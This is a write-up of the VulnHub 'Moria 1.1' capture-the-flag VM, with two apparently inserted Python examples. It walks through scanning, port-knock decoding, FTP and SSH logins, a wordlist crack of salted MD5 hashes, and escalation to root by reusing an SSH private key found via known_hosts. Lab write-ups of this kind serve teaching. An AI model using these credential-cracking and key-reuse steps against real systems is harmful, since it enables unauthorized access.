CTF Walkthrough: Moria 1.1

Before I get started, I would like to clarify that this challenge is less hacking (no exploits or anything of that nature needed), and more capture the flag, where each step will give you a clue to get to the next step. This one drove me nuts in a couple of spots, and because I wasn’t in the right mindset going in, I did ask a friend who had completed it for a hint. Twice. Each time he was able to say something that got me back on track; I was pretty much overthinking it each time.

Anyway, off we go, let’s get started with Moria 1.1, available at VulnHub. The goal of this challenge is to get root and read the flag.

Also, to be completely transparent, I spent a lot of time going down dead ends on this one, and I’m only (mostly) writing up the proper ways to get through this challenge to keep it simple and straightforward.

As always, we start with port discovery.

root@kali:~# nmap -A -T4 -sS

Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-11 21:52 EST
Nmap scan report for
Host is up (0.00052s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 6.6.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 47:b5:ed:e3:f9:ad:96:88:c0:f2:83:23:7f:a3:d3:4f (RSA)
|   256 85:cd:a2:d8:bb:85:f6:0f:4e:ae:8c:aa:73:52:ec:63 (ECDSA)
|_  256 b1:77:7e:08:b3:a0:84:f8:f4:5d:f9:8e:d5:85:b9:34 (EdDSA)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Gates of Moria
MAC Address: 08:00:27:E5:47:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop

1   0.52 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.88 seconds

Let’s poke at FTP first (I didn’t do this in exactly this order myself, but it makes more sense this way).

root@kali:~# ftp
Connected to
220 Welcome Balrog!
Name ( 

Welcome Balrog? Is that my name now? Sure, I’ll be Balrog. Unfortunately no password that I tried worked (of course), but we’ll just keep this in mind for later.

Opening port 80 in a browser shows us just an image. Being a LOTR fan, I immediately recognize it as a drawing of the magical door to get into the Dwarf caves. Gandalf had to say “friend” in Elvish to enter, which is “Mellon”, which is basically what the text says. (Yes, I tried, and no, “Mellon” is not a password, not exactly anyway, but we’ll get there.) The source for the page reveals nothing of interest.

So let’s run gobuster on it.

root@kali:~# gobuster -u -w /usr/share/wordlists/dirb/big.txt 

Gobuster v1.2                OJ Reeves (@TheColonial)
[+] Mode         : dir
[+] Url/Domain   :
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirb/big.txt
[+] Status codes : 204,301,302,307,200
/w (Status: 301)

And then open in the browser. And then, and then, etc, etc, etc, until we end up here:

It looks like refreshing this page will pick one of these messages at random.

Balin: "Be quiet, the Balrog will hear you!" 
Telchar to Thrain:"That human is slow, don't give up yet" 
"Eru! Save us!" 
Ori:"Will anyone hear us?" 
Maeglin:"The Balrog is not around, hurry!" 
"We will die here.." 
Nain:"Will the human get the message?" 
Fundin:"That human will never save us!" 
"Knock knock" 
Oin:"Stop knocking!" 
"Is this the end?" 
"Too loud!" 

Hmmmm, “Knock knock”? Message? Too loud? Balrog will hear you? (Remember, FTP called us Balrog.) So they’re doing something that they’re afraid I will hear? Maybe I need to listen to something. But what can I do to listen to something the server is doing?

I thought maybe there should be some port knocking to open up a service/port on the server, so I ran the following to knock on those eight ports in order.

for x in 77 101 108 108 111 110 54 57; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x; done

Another nmap scan showed nothing new, but eventually I realized that those numbers fall in the ASCII range, whereas port knocking could go up to port 65535. So I converted those numbers to ASCII characters and ended up with “Mellon69”. (“Mellon” is Elvish for “friend”, which is mentioned in the image of the gate from the index page on port 80.)

So now we have a potential user name (Balrog), and maybe a password (Mellon69). So let’s try to use SSH.

root@kali:~# ssh Balrog@
Balrog@'s password: Mellon69
Last login: Sat Nov 11 11:09:26 2017


Connection to closed.

Okay, that seems like a clue, and that seems like a valid account at least. I checked the browser (the picture of the gate), no change, so let’s try this same account information with FTP.

root@kali:~# ftp
Connected to
220 Welcome Balrog!
Name ( Balrog
331 Please specify the password.
Password: Mellon69
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Nice, we’re in. I poked around for an embarrassingly long time before getting the bright idea to look in the web root to see if there was anything gobuster didn’t pick up.

ftp> cd /var/www/html/
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0              23 Mar 12  2017 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
-r--------    1 48       48             85 Mar 12  2017 index.php
-r--------    1 48       48         161595 Mar 11  2017 moria.jpg
drwxr-xr-x    3 0        0              15 Mar 12  2017 w
226 Directory send OK.

Yyyyyup. Let’s go there (and view the source).

<style type="text/css">
.tg  {border-collapse:collapse;border-spacing:0;}
.tg td{font-family:Arial, sans-serif;font-size:14px;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg th{font-family:Arial, sans-serif;font-size:14px;font-weight:normal;padding:10px 5px;border-style:solid;border-width:1px;overflow:hidden;word-break:normal;}
.tg .tg-yw4l{vertical-align:top}
</style>
<table class="tg">
  <tr>
    <th class="tg-yw4l"><b>Prisoner's name</b><br></th>
    <th class="tg-yw4l"><b>Passkey</b></th>
  </tr>
  <tr>
    <td class="tg-yw4l">Balin<br></td>
    <td class="tg-yw4l">c2d8960157fc8540f6d5d66594e165e0</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Oin</td>
    <td class="tg-yw4l">727a279d913fba677c490102b135e51e</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Ori</td>
    <td class="tg-yw4l">8c3c3152a5c64ffb683d78efc3520114</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Maeglin</td>
    <td class="tg-yw4l">6ba94d6322f53f30aca4f34960203703</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Fundin</td>
    <td class="tg-yw4l">c789ec9fae1cd07adfc02930a39486a1</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Nain</td>
    <td class="tg-yw4l">fec21f5c7dcf8e5e54537cfda92df5fe</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Dain</td>
    <td class="tg-yw4l">6a113db1fd25c5501ec3a5936d817c29</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Thrain</td>
    <td class="tg-yw4l">7db5040c351237e8332bfbba757a1019</td>
  </tr>
  <tr>
    <td class="tg-yw4l">Telchar</td>
    <td class="tg-yw4l">dd272382909a4f51163c77da6356cc6f</td>
  </tr>
</table>

Okay, a list of usernames and hashed passwords. Also a very useful bit of information in the comment. Basically the author took the password, hashed it with MD5, appended a random six-character string (the salt), and then ran it through MD5 again. I did quite a bit of Google searching to find the easiest way to decrypt this (did you know Google results span multiple pages? I think I went to “Page 2” for this), before I found that hashcat has a mode built in that will handle this. So let’s set up a text file with the hashes and salts that hashcat can understand.


The mode we’ll want to use is 2611.
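To make the scheme concrete, here is an added Python example (mine, not part of the original write-up or the VM) that reproduces the md5(md5($pass).$salt) construction behind hashcat mode 2611, renders entries in the hash:salt line format that mode expects, and runs a small wordlist check against them. The account names, salts and passwords below are constructed for the demo; the VM's real salts are not on this page, so nothing here is taken from its table.

```python
import hashlib
from typing import Dict, Iterable, Tuple


def md5_hex(data: bytes) -> str:
    """Hex digest of MD5, the primitive the challenge's passkeys are built from."""
    return hashlib.md5(data).hexdigest()


def hash_passkey(password: str, salt: str) -> str:
    """md5(md5($pass).$salt), i.e. hashcat mode 2611.

    The inner digest is rendered as its 32-character hex string, the salt is
    appended to that text (not to the raw bytes), and the result is hashed
    again. Getting either detail wrong produces a hash that never matches.
    """
    inner = md5_hex(password.encode())
    return md5_hex((inner + salt).encode())


def hashcat_lines(accounts: Dict[str, Tuple[str, str]]) -> str:
    """Render {name: (hash, salt)} as the hash:salt lines mode 2611 reads."""
    return "\n".join(f"{digest}:{salt}" for digest, salt in accounts.values())


def crack(accounts: Dict[str, Tuple[str, str]], wordlist: Iterable[str]) -> Dict[str, str]:
    """Wordlist check: return {name: password} for each account whose passkey
    matches a candidate. Per-user salts stop precomputation across users but,
    because MD5 is fast and unkeyed, do nothing against a plain dictionary run."""
    words = list(wordlist)
    found = {}
    for name, (digest, salt) in accounts.items():
        for word in words:
            if hash_passkey(word, salt) == digest:
                found[name] = word
                break
    return found


def build_sample_accounts() -> Dict[str, Tuple[str, str]]:
    """Constructed demo data (names, salts and passwords are made up here)."""
    secrets = {
        "prisoner_a": ("spanky", "a1b2c3"),
        "prisoner_b": ("mellon", "d4e5f6"),
        "prisoner_c": ("correcthorse", "g7h8i9"),
    }
    return {name: (hash_passkey(pw, salt), salt) for name, (pw, salt) in secrets.items()}


if __name__ == "__main__":
    accounts = build_sample_accounts()
    print(hashcat_lines(accounts))                       # what goes into accounts.txt
    print(crack(accounts, ["password", "spanky", "mellon", "123456"]))
```

The `hashcat_lines` output is what the accounts file fed to `hashcat -m 2611` should look like, one `hash:salt` pair per line; `crack` is only there to show the scheme is reproduced correctly, hashcat does the real work against rockyou.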

root@kali:~/CTF/Moria# hashcat -m 2611 --force --show accounts.txt /usr/share/wordlists/rockyou.txt

And matching up the results with the account names yields the following:


Let’s go ahead and give these accounts a shot. (Skipping all the ones that didn’t work, because that’s boring.)

root@kali:~/CTF/Moria# ssh Ori@
Ori@'s password: spanky
Last login: Sat Nov 11 17:12:27 2017 from ::1
-bash-4.2$ id
uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)

Nice, we’re in! Hopefully we’re almost done, this one is taking me a while to get through!

Okay, I spent a long time here. I tried running a ton of privilege escalation cracks, shortcuts, hacks, anything I could think of, but nothing worked. Eventually I asked my friend for a clue, and he pointed me in the right direction, telling me to look in ~/.ssh/known_hosts. I of course already took a look at this file, but I failed to notice the irregularity in the file.

Basically, if you see (or localhost) in that file, then that user has logged in to the machine locally using SSH. The only reasons to do that are to test the SSH server, or maybe to log in as root if the current user can’t sudo?
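That irregularity is a useful triage signal in its own right: a user's known_hosts pointing back at the machine it lives on means someone has been SSHing into the box from the box, which is worth explaining during a review or an incident. The following is an added Python example (mine, not from the write-up) that parses known_hosts lines and flags entries whose host field is loopback, localhost, or one of the host's own addresses passed in by the caller. The sample file is constructed, with made-up key material; hashed entries (HashKnownHosts) are skipped because their hostnames cannot be read back.

```python
import ipaddress
from typing import Dict, Iterable, List, Tuple

LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}


def normalize_host(token: str) -> str:
    """Strip the [host]:port form OpenSSH uses for non-default ports."""
    if token.startswith("[") and "]" in token:
        token = token[1:token.index("]")]
    return token.lower()


def is_self_reference(token: str, own_addrs: Iterable[str] = ()) -> bool:
    """True if the host field names the machine itself: a loopback name,
    a loopback IP, or any address the caller lists as belonging to this host."""
    host = normalize_host(token)
    if host in LOOPBACK_NAMES or host in {a.lower() for a in own_addrs}:
        return True
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:          # a hostname, not an IP literal
        return False


def parse_known_hosts(text: str) -> List[Dict]:
    """Minimal known_hosts parser: hosts[,hosts...] keytype base64 [comment],
    with an optional leading @cert-authority / @revoked marker."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if fields[0].startswith("@"):
            fields = fields[1:]
        if len(fields) < 3:
            continue
        entries.append({
            "line": lineno,
            "hosts": fields[0].split(","),
            "keytype": fields[1],
            "hashed": fields[0].startswith("|1|"),   # HashKnownHosts yes
        })
    return entries


def find_self_logins(text: str, own_addrs: Iterable[str] = ()) -> List[Tuple[int, List[str], str]]:
    """Return (line, hosts, keytype) for every entry that points at this host."""
    hits = []
    for entry in parse_known_hosts(text):
        if entry["hashed"]:
            continue        # would need the HMAC check against candidate names
        if any(is_self_reference(h, own_addrs) for h in entry["hosts"]):
            hits.append((entry["line"], entry["hosts"], entry["keytype"]))
    return hits


# Constructed sample, not taken from the VM; key blobs are placeholders.
SAMPLE_KNOWN_HOSTS = """\
# constructed sample known_hosts
github.example ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHRlc3Q=
127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTY=
[localhost]:2222,::1 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC=
192.0.2.10 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGRlbW8=
|1|c2FsdHNhbHQ=|aGFzaGVkaG9zdA== ssh-rsa AAAAB3NzaC1yc2E=
"""

if __name__ == "__main__":
    for line, hosts, keytype in find_self_logins(SAMPLE_KNOWN_HOSTS, own_addrs=["192.0.2.10"]):
        print(f"line {line}: {','.join(hosts)} ({keytype}) points at this host")
```

Passing the machine's own interface addresses as `own_addrs` catches the case where the user typed the box's LAN IP rather than 127.0.0.1, which is what the entry on this VM looks like.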

-bash-4.2$ cat ~/.ssh/known_hosts
 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
-bash-4.2$ ssh root@ -i ~/.ssh/id_rsa
Last login: Sat Nov 11 17:15:09 2017 from
[root@Moria ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@Moria ~]# cat /root/flag.txt 
“All that is gold does not glitter,
Not all those who wander are lost;
The old that is strong does not wither,
Deep roots are not reached by the frost.

From the ashes a fire shall be woken,
A light from the shadows shall spring;
Renewed shall be blade that was broken,
The crownless again shall be king.” 

All That is Gold Does Not Glitter by J. R. R. Tolkien

I hope you suff.. enjoyed this VM. It wasn't so hard, was it?